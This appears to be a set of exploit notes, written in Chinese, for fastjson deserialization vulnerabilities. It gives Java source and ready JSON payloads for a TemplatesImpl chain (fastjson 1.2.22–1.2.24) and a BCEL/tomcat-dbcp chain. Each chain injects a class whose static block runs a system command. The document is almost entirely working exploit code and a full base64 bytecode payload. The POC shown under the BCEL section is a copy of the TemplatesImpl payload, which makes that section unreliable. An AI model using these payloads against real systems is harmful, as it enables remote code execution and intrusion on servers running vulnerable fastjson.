TemplatesImpl利用链
影响版本:fastjson 1.2.22 - 1.2.24
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
public class Calc extends AbstractTranslet {
static {
try {
String[] cmd = {"calc"};
java.lang.Runtime.getRuntime().exec(cmd).waitFor();
} catch ( Exception e ) {
e.printStackTrace();
}
}
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
}
package sec;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.util.IOUtils;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
public class FastjsonTemplatesImpl {
public static void main(String[] args) throws IOException {
byte[] code = Files.readAllBytes(Paths.get("Class文件的绝对路径"));
String byteCode = Base64.getEncoder().encodeToString(code);
final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
String payload = "{\"@type\":\"" + NASTY_CLASS +
"\",\"_bytecodes\":[\""+byteCode+"\"]," +
"'_name':'Evil'," +
"'_tfactory':{}," +
"\"_outputProperties\":{}}\n";
System.out.println(payload);
Object object = JSON.parseObject(payload, Feature.SupportNonPublicField);
}
}
POC:
{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADQAPgoACgAoBwApCAAqCgArACwKACsALQoALgAvBwAwCgAHADEHADIHADMBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEABkxFdmlsOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwA0AQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAg8Y2xpbml0PgEAA2NtZAEAE1tMamF2YS9sYW5nL1N0cmluZzsBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAMAEAClNvdXJjZUZpbGUBAAlFdmlsLmphdmEMAAsADAEAEGphdmEvbGFuZy9TdHJpbmcBAARjYWxjBwA1DAA2ADcMADgAOQcAOgwAOwA8AQATamF2YS9sYW5nL0V4Y2VwdGlvbgwAPQAMAQAERXZpbAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAHd2FpdEZvcgEAAygpSQEAD3ByaW50U3RhY2tUcmFjZQAhAAkACgAAAAAABAABAAsADAABAA0AAAAvAAEAAQAAAAUqtwABsQAAAAIADgAAAAYAAQAAAAcADwAAAAwAAQAAAAUAEAARAAAAAQASABMAAgANAAAAPwAAAAMAAAABsQAAAAIADgAAAAYAAQAAABcADwAAACAAAwAAAAEAEAARAAAAAAABABQAFQABAAAAAQAWABcAAgAYAAAABAABABkAAQASABoAAgANAAAASQAAAAQAAAABsQAAAAIADgAAAAYAAQAAABwADwAAACoABAAAAAEAEAARAAAAAAABABQAFQABAAAAAQAbABwAAgAAAAEAHQAeAAMAGAAAAAQAAQAZAAgAHwAMAAEADQAAAHsABAABAAAAHgS9AAJZAxIDU0u4AAQqtgAFtgAGV6cACEsqtgAIsQABAAAAFQAYAAcAAwAOAAAAGgAGAAAADAAKAA0AFQAQABgADgAZAA8AHQARAA8AAAAWAAIACgALACAAIQAAABkABAAiACMAAAAkAAAABwACWAcAJQQAAQAmAAAAAgAn"],'_name':'Evil','_tfactory':{},"_outputProperties":{}}
BCEL字节码利用
需要依赖:
<dependency>
<groupId>org.apache.tomcat</groupId>
<artifactId>tomcat-dbcp</artifactId>
<version>9.0.8</version>
</dependency>
import java.io.IOException;
public class Calc {
static {
try {
Runtime.getRuntime().exec("calc");
} catch (IOException e) {
e.printStackTrace();
}
}
}
package sec;
import com.alibaba.fastjson.JSON;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import java.nio.file.Files;
import java.nio.file.Paths;
class fastjsonbecl {
public static void main(String[] argv) throws Exception{
byte[] bytes = Files.readAllBytes(Paths.get("Class文件的绝对路径"));
String code = Utility.encode(bytes,true);
String poc = "{\n" +
" {\n" +
" \"aaa\": {\n" +
" \"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n" +
" \"driverClassLoader\": {\n" +
" \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n" +
" },\n" +
" \"driverClassName\": \"$$BCEL$$"+ code+ "\"\n" +
" }\n" +
" }: \"bbb\"\n" +
"}";
System.out.println(poc);
JSON.parse(poc);
}
}
POC:
{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADQAPgoACgAoBwApCAAqCgArACwKACsALQoALgAvBwAwCgAHADEHADIHADMBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEABkxFdmlsOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwA0AQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAg8Y2xpbml0PgEAA2NtZAEAE1tMamF2YS9sYW5nL1N0cmluZzsBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAMAEAClNvdXJjZUZpbGUBAAlFdmlsLmphdmEMAAsADAEAEGphdmEvbGFuZy9TdHJpbmcBAARjYWxjBwA1DAA2ADcMADgAOQcAOgwAOwA8AQATamF2YS9sYW5nL0V4Y2VwdGlvbgwAPQAMAQAERXZpbAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAHd2FpdEZvcgEAAygpSQEAD3ByaW50U3RhY2tUcmFjZQAhAAkACgAAAAAABAABAAsADAABAA0AAAAvAAEAAQAAAAUqtwABsQAAAAIADgAAAAYAAQAAAAcADwAAAAwAAQAAAAUAEAARAAAAAQASABMAAgANAAAAPwAAAAMAAAABsQAAAAIADgAAAAYAAQAAABcADwAAACAAAwAAAAEAEAARAAAAAAABABQAFQABAAAAAQAWABcAAgAYAAAABAABABkAAQASABoAAgANAAAASQAAAAQAAAABsQAAAAIADgAAAAYAAQAAABwADwAAACoABAAAAAEAEAARAAAAAAABABQAFQABAAAAAQAbABwAAgAAAAEAHQAeAAMAGAAAAAQAAQAZAAgAHwAMAAEADQAAAHsABAABAAAAHgS9AAJZAxIDU0u4AAQqtgAFtgAGV6cACEsqtgAIsQABAAAAFQAYAAcAAwAOAAAAGgAGAAAADAAKAA0AFQAQABgADgAZAA8AHQARAA8AAAAWAAIACgALACAAIQAAABkABAAiACMAAAAkAAAABwACWAcAJQQAAQAmAAAAAgAn"],'_name':'Evil','_tfactory':{},"_outputProperties":{}}